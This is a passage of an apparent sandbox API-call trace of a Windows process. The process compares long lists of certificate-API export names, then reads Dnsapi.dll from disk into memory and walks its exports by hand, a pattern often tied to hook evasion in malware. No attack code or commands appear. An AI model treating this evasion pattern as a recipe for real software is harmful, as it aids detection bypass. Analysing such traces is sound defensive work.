lpString2="CertAddCTLContextToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0271.725] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0271.726] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.726] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0271.727] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.727] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.727] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0271.727] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0271.727] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0271.728] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0271.728] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.728] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.728] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0271.729] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0271.729] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0271.729] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0271.729] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0271.729] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0271.729] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0271.729] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0271.729] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0271.729] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.730] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0271.730] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0271.730] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0271.730] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0271.730] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0271.730] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0271.731] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0271.731] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0271.731] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0271.731] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0271.732] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0271.732] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0271.732] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0271.733] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0271.734] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0271.831] GetProcessHeap () returned 0x400000 [0271.923] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x3ff8040 | out: hHeap=0x400000) returned 1 [0271.933] GetProcessHeap () returned 0x400000 [0271.933] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x419340 [0271.934] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0271.953] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0271.953] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0271.953] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0271.954] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0271.954] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0271.954] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0271.954] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0271.954] GetProcessHeap () returned 0x400000 [0271.954] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xa7b88) returned 0x396d010 [0271.956] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0271.957] ReadFile (in: hFile=0x17c, lpBuffer=0x396d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x396d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0272.111] CloseHandle (hObject=0x17c) returned 1 [0272.111] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0272.112] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.112] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0272.112] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.112] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.112] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0272.112] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.112] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.112] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0272.112] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0272.112] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.113] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.113] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0272.113] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0272.113] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0272.113] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.113] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.113] lstrcmpA 